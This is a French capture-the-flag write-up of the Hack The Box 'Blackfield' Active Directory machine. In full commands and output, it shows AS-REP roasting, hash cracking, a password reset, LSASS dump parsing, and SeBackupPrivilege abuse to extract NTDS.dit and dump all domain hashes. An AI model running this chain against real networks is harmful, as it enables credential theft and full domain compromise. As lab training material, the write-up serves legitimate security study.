# Blackfield
`kerberoast` `SeBackUp`
* Nom machine : Blackfield
* Difficulté : Difficile
* OS : Windows - AD
## Enumération
### NMAP
```
Nmap scan report for 10.10.10.192
Host is up (0.031s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-14 20:15:47Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
```
### SMB
```
┌──(kali㉿kali)-[~/htb/black]
└─$ smbmap -H 10.10.10.192 -u '%'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.10.10.192:445 Name: 10.10.10.192 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
profiles$ READ ONLY
SYSVOL NO ACCESS Logon server share
```
On obient une liste d'usernames
```
┌──(kali㉿kali)-[~/htb/black]
└─$ smbclient //10.10.10.192/profiles$
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jun 3 12:47:12 2020
.. D 0 Wed Jun 3 12:47:12 2020
AAlleni D 0 Wed Jun 3 12:47:11 2020
ABarteski D 0 Wed Jun 3 12:47:11 2020
ABekesz D 0 Wed Jun 3 12:47:11 2020
ABenzies D 0 Wed Jun 3 12:47:11 2020
ABiemiller D 0 Wed Jun 3 12:47:11 2020
AChampken D 0 Wed Jun 3 12:47:11 2020
```
```
┌──(kali㉿kali)-[~/htb/black]
└─$ awk '{ print $1 }' user.txt > users.txt
```
## Accès initial
```
┌──(kali㉿kali)-[~/htb/black]
└─$ impacket-GetNPUsers -dc-ip 10.10.10.192 BLACKFIELD.local/ -usersfile users.txt -format hashcat -outputfile hash.txt
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies
┌──(kali㉿kali)-[~/htb/black]
└─$ cat hash.txt
$krb5asrep$23$support@BLACKFIELD.LOCAL:c4e3415c5327a40f69644399ee905d2e$f65ad5c38c07ae53c0e1def2b769e73097ebf96d45d935111d249392a1b072bcd8c39830a2e5fad7b1cf5219765771e8f9f9ea1ee1b4b9b4ce5f3379062c2337d068e30d0f6df250d2e38b8283bd5cf1d4730c8c5756cfaf9760408bff9c3c50749af1f2f1bcd8bea741457a664add2e19d29a270f9c313ab68570d07381f381c77cd5a65e23c7f9edcfd120e16a0e9ec7fc450c68a5684bac9631f83b46e323030fa149cca95b6e8f952e2b7aebc8d0e603a7cdc30a56124c5ad003b8440b64c0d295da166c442f812038c7feaee44e293710e51c0256edd28cffc1e183caf53ec8af44046d76d55081edb6450963d5153adc7d
```
```
┌──(kali㉿kali)-[~/htb/black]
└─$ hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
{...}
$krb5asrep$23$support@BLACKFIELD.LOCAL:c4e3415c5327a40f69644399ee905d2e$f65ad5c38c07ae53c0e1def2b769e73097ebf96d45d935111d249392a1b072bcd8c39830a2e5fad7b1cf5219765771e8f9f9ea1ee1b4b9b4ce5f3379062c2337d068e30d0f6df250d2e38b8283bd5cf1d4730c8c5756cfaf9760408bff9c3c50749af1f2f1bcd8bea741457a664add2e19d29a270f9c313ab68570d07381f381c77cd5a65e23c7f9edcfd120e16a0e9ec7fc450c68a5684bac9631f83b46e323030fa149cca95b6e8f952e2b7aebc8d0e603a7cdc30a56124c5ad003b8440b64c0d295da166c442f812038c7feaee44e293710e51c0256edd28cffc1e183caf53ec8af44046d76d55081edb6450963d5153adc7d:#00^BlackKnight
```
`support:#00^BlackKnight`
```
──(kali㉿kali)-[~/htb/black]
└─$ nxc smb 10.10.10.192 -u support -p '#00^BlackKnight' --rid-brute
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.10.10.192 445 DC01 498: BLACKFIELD\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.10.192 445 DC01 500: BLACKFIELD\Administrator (SidTypeUser)
SMB 10.10.10.192 445 DC01 501: BLACKFIELD\Guest (SidTypeUser)
{...}
┌──(kali㉿kali)-[~/htb/black]
└─$ cat users2.txt
lydericlefebvre
support
svc_backup
administrator
audit2020
```
Nous avons crée une nouvelle liste d'utilisateur.
Nous continuons l'analyse à l'aide de bloodhound.
```
┌──(kali㉿kali)-[~/htb/black]
└─$ nxc ldap 10.10.10.192 -u support -p '#00^BlackKnight' --bloodhound --collection All --dns-server 10.10.10.192
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.192 389 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
LDAP 10.10.10.192 389 DC01 Resolved collection methods: psremote, group, container, objectprops, acl, dcom, rdp, session, trusts, localadmin
LDAP 10.10.10.192 389 DC01 Done in 00M 06S
LDAP 10.10.10.192 389 DC01 Compressing output into /home/kali/.nxc/logs/DC01_10.10.10.192_2024-11-14_084727_bloodhound.zip
```
```
┌──(kali㉿kali)-[~/htb/black]
└─$ net rpc password 'audit2020' 'aze123!' -U BLACKFIELD.local/support -S '10.10.10.192'
Password for [BLACKFIELD.LOCAL\support]:
┌──(kali㉿kali)-[~/htb/black]
└─$ nxc smb 10.10.10.192 -u audit2020 -p 'aze123!' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:aze123!
SMB 10.10.10.192 445 DC01 [*] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
```
```
┌──(kali㉿kali)-[~/htb/black]
└─$ smbclient //10.10.10.192/forensic -U 'audit2020'
Password for [WORKGROUP\audit2020]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Feb 23 08:03:16 2020
.. D 0 Sun Feb 23 08:03:16 2020
commands_output D 0 Sun Feb 23 13:14:37 2020
memory_analysis D 0 Thu May 28 16:28:33 2020
tools D 0 Sun Feb 23 08:39:08 2020
5102079 blocks of size 4096. 1687406 blocks available
smb: \> prompt off
smb: \> recurse
smb: \> mget *
{...}
```
```
┌──(kali㉿kali)-[~/htb/black]
└─$ cd memory_analysis
┌──(kali㉿kali)-[~/htb/black]
└─$ unzip lsass.zip
──(kali㉿kali)-[~/htb/black/memory_analysis]
└─$ pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef621
{...}
```
Nous récupérons un hash et nous pouvons nous connecter
## Elévation des privilèges
Nous avons le droit SeBackUpPrivilege.
```
┌──(kali㉿kali)-[~/…/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug]
└─$ cat cmd
set context persistent nowriters
add volume c: alias temp
create
expose %temp% h:
exit
┌──(kali㉿kali)-[~/…/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug]
└─$ unix2dos cmd
unix2dos: converting file cmd to DOS format...
```
```
*Evil-WinRM* PS C:\windows\temp> upload cmd
Info: Uploading /home/kali/htb/black/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/cmd to C:\windows\temp\cmd
Data: 120 bytes of 120 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\windows\temp> diskshadow /s C:\Windows\Temp\cmd
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 11/14/2024 3:46:10 PM
-> set context persistent nowriters
-> add volume c: alias temp
-> create
Alias temp for shadow ID {4cd00a7c-d93a-4cb4-800a-7e4f1bd678b6} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {11db02fe-b78d-48e5-b93f-807621eab922} set as environment variable.
Querying all shadow copies with the shadow copy set ID {11db02fe-b78d-48e5-b93f-807621eab922}
* Shadow copy ID = {4cd00a7c-d93a-4cb4-800a-7e4f1bd678b6} %temp%
- Shadow copy set: {11db02fe-b78d-48e5-b93f-807621eab922} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 11/14/2024 3:46:11 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %temp% h:
-> %temp% = {4cd00a7c-d93a-4cb4-800a-7e4f1bd678b6}
The shadow copy was successfully exposed as h:\.
-> exit
```
{% embed url="" %}
```
*Evil-WinRM* PS C:\windows\temp> upload SeBackupPrivilegeUtils.dll
Info: Uploading /home/kali/htb/black/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll to C:\windows\temp\SeBackupPrivilegeUtils.dll
Data: 21844 bytes of 21844 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\windows\temp> upload SeBackupPrivilegeCmdLets.dll
Info: Uploading /home/kali/htb/black/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll to C:\windows\temp\SeBackupPrivilegeCmdLets.dll
Data: 16384 bytes of 16384 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\windows\temp> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\windows\temp> import-module .\SeBackupPrivilegeUtils.dll
```
```
*Evil-WinRM* PS C:\windows\temp> Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite
*Evil-WinRM* PS C:\windows\temp> Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite
*Evil-WinRM* PS C:\windows\temp> download NTDS
Info: Downloading C:\windows\temp\NTDS to NTDS
Info: Download successful!
*Evil-WinRM* PS C:\windows\temp> download SYSTEM
Info: Downloading C:\windows\temp\SYSTEM to SYSTEM
Info: Download successful!
```
```
┌──(kali㉿kali)-[~/…/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug]
└─$ impacket-secretsdump -ntds NTDS -system SYSTEM LOCAL
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from NTDS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:2922a2376739265d9fb87730b7bbeec9:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
{...}
```
```
```